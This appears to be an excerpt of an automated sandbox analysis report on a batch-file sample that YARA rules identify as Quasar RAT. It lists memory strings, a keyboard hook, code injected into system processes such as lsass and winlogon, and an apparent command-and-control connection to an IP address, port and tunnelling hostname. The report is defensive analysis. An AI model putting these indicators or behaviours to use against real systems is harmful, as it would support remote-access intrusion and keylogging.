              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000003.2197674660.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046733621.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909514725.00000202C0256000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
              Source: lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: lsass.exe, 00000019.00000000.2046733621.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909286057.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
              Source: lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000003.2197674660.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046733621.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909514725.00000202C0256000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000003.2197674660.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046733621.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909514725.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.000002428799C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
              Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
              Source: $sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
              Source: $sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
              Source: $sxr-powershell.exe, 00000015.00000002.2927032534.000002428794F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.0000024287975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
              Source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownDNS traffic detected: queries for: throbbing-mountain-09011.pktriot.net
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\$sxr-powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\$sxr-powershell.exeJump to behavior

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR

              System Summary

              barindex
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.28539411228.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.28539411228.18.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.unpack, type: UNPACKEDPEMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
              Source: WinScanGuard_v.2.1.batStatic file information: 13030371
              Source: C:\Windows\$sxr-powershell.exeNetwork Connect: 167.71.56.116 22112Jump to behavior
              Source: C:\Windows\$sxr-cmd.exeProcess created: Commandline size = 7207
              Source: C:\Windows\$sxr-powershell.exeProcess created: Commandline size = 7313
              Source: C:\Windows\$sxr-cmd.exeProcess created: Commandline size = 7207Jump to behavior
              Source: C:\Windows\$sxr-powershell.exeProcess created: Commandline size = 7313Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144
              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400013686_2_0000000140001368
              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400010146_2_0000000140001014
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AAD217813_2_000001A00AAD2178
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AADB0D013_2_000001A00AADB0D0
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AADF39813_2_000001A00AADF398
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AADB2DC13_2_000001A00AADB2DC
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00AAE16F813_2_000001A00AAE16F8
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDB2D7813_2_000001A00BDB2D78
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDBBCD013_2_000001A00BDBBCD0
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDBFF9813_2_000001A00BDBFF98
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDC22F813_2_000001A00BDC22F8
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_000001A00BDBBEDC13_2_000001A00BDBBEDC
              Source: C:\Windows\$sxr-mshta.exeCode function: 13_2_00007FF7142F100813_2_00007FF7142F1008
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B5FF39816_2_0000020D0B5FF398
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B5FB2DC16_2_0000020D0B5FB2DC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B6016F816_2_0000020D0B6016F8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B5F217816_2_0000020D0B5F2178
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B5FB0D016_2_0000020D0B5FB0D0
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B62FF9816_2_0000020D0B62FF98
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B62BEDC16_2_0000020D0B62BEDC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B6322F816_2_0000020D0B6322F8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B622D7816_2_0000020D0B622D78
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_0000020D0B62BCD016_2_0000020D0B62BCD0
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154FAA5416_2_00007FF6154FAA54
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615500A6C16_2_00007FF615500A6C
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61550555416_2_00007FF615505554
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61550422416_2_00007FF615504224
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6155037D816_2_00007FF6155037D8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154FE68016_2_00007FF6154FE680
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551EE8816_2_00007FF61551EE88
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F765016_2_00007FF6154F7650
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154FD25016_2_00007FF6154FD250
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F9E5016_2_00007FF6154F9E50
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F524016_2_00007FF6154F5240
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F372C16_2_00007FF6154F372C
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615517F0016_2_00007FF615517F00
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F6EE416_2_00007FF6154F6EE4
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61552153816_2_00007FF615521538
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154FCE1016_2_00007FF6154FCE10
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551AA3016_2_00007FF61551AA30
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F8DF816_2_00007FF6154F8DF8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F4A3016_2_00007FF6154F4A30
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F222016_2_00007FF6154F2220
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F81D416_2_00007FF6154F81D4
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551D9D016_2_00007FF61551D9D0
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F188416_2_00007FF6154F1884
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61550785416_2_00007FF615507854
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F2C4816_2_00007FF6154F2C48
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551AC4C16_2_00007FF61551AC4C
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F851016_2_00007FF6154F8510
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F7D3016_2_00007FF6154F7D30
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6155018D416_2_00007FF6155018D4
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154FB0D816_2_00007FF6154FB0D8
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F3F9016_2_00007FF6154F3F90
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F9B5016_2_00007FF6154F9B50
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F5B7016_2_00007FF6154F5B70
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F341016_2_00007FF6154F3410
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551AFBC16_2_00007FF61551AFBC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F6BE016_2_00007FF6154F6BE0
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_000002428788217821_2_0000024287882178
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_000002428788B0D021_2_000002428788B0D0
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_000002428788F39821_2_000002428788F398
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_000002428788B2DC21_2_000002428788B2DC
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878916F821_2_00000242878916F8
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878B2D7821_2_00000242878B2D78
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878BBCD021_2_00000242878BBCD0
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878BFF9821_2_00000242878BFF98
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878BBEDC21_2_00000242878BBEDC
              Source: C:\Windows\$sxr-powershell.exeCode function: 21_2_00000242878C22F821_2_00000242878C22F8
              Source: C:\Windows\System32\dllhost.exeCode function: 22_2_0000000140001B3022_2_0000000140001B30
              Source: C:\Windows\System32\dllhost.exeCode function: 22_2_000000014000119C22_2_000000014000119C
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6216F824_2_00000225DC6216F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC61B2DC24_2_00000225DC61B2DC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC61F39824_2_00000225DC61F398
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC61B0D024_2_00000225DC61B0D0
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC61217824_2_00000225DC612178
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6522F824_2_00000225DC6522F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC64BEDC24_2_00000225DC64BEDC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC64FF9824_2_00000225DC64FF98
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC64BCD024_2_00000225DC64BCD0
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC642D7824_2_00000225DC642D78
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6816F824_2_00000225DC6816F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC67B2DC24_2_00000225DC67B2DC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC67F39824_2_00000225DC67F398
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC67B0D024_2_00000225DC67B0D0
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC67217824_2_00000225DC672178
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7016F824_2_00000225DC7016F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6FB2DC24_2_00000225DC6FB2DC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6FF39824_2_00000225DC6FF398
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6FB0D024_2_00000225DC6FB0D0
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC6F217824_2_00000225DC6F2178
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7616F824_2_00000225DC7616F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC75B2DC24_2_00000225DC75B2DC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC75F39824_2_00000225DC75F398
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC75B0D024_2_00000225DC75B0D0
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC75217824_2_00000225DC752178
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7C16F824_2_00000225DC7C16F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7BB2DC24_2_00000225DC7BB2DC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7BF39824_2_00000225DC7BF398
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7BB0D024_2_00000225DC7BB0D0
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC7B217824_2_00000225DC7B2178
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC81B2DC24_2_00000225DC81B2DC
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC8216F824_2_00000225DC8216F8
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC81F39824_2_00000225DC81F398
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC81217824_2_00000225DC812178
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC81B0D024_2_00000225DC81B0D0
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0ABF39825_2_00000202C0ABF398
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AC16F825_2_00000202C0AC16F8
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0ABB2DC25_2_00000202C0ABB2DC
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AB217825_2_00000202C0AB2178
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0ABB0D025_2_00000202C0ABB0D0
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AEFF9825_2_00000202C0AEFF98
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AF22F825_2_00000202C0AF22F8
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AEBEDC25_2_00000202C0AEBEDC
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AE2D7825_2_00000202C0AE2D78
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AEBCD025_2_00000202C0AEBCD0
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_0400EDD126_2_0400EDD1
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeCode function: 26_2_0402F9D126_2_0402F9D1
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6612E16F827_2_000002A6612E16F8
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6612DF39827_2_000002A6612DF398
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6612DB2DC27_2_000002A6612DB2DC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6612D217827_2_000002A6612D2178
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6612DB0D027_2_000002A6612DB0D0
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6613122F827_2_000002A6613122F8
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130FF9827_2_000002A66130FF98
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130BEDC27_2_000002A66130BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A661302D7827_2_000002A661302D78
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66130BCD027_2_000002A66130BCD0
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A6613722F827_2_000002A6613722F8
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136FF9827_2_000002A66136FF98
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136BEDC27_2_000002A66136BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A661362D7827_2_000002A661362D78
              Source: C:\Windows\System32\svchost.exeCode function: 27_2_000002A66136BCD027_2_000002A66136BCD0
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF1E16F830_2_000002BAAF1E16F8
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF1DB2DC30_2_000002BAAF1DB2DC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF1DB0D030_2_000002BAAF1DB0D0
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF1D217830_2_000002BAAF1D2178
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF1DF39830_2_000002BAAF1DF398
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF20B2DC30_2_000002BAAF20B2DC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF2116F830_2_000002BAAF2116F8
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF20B0D030_2_000002BAAF20B0D0
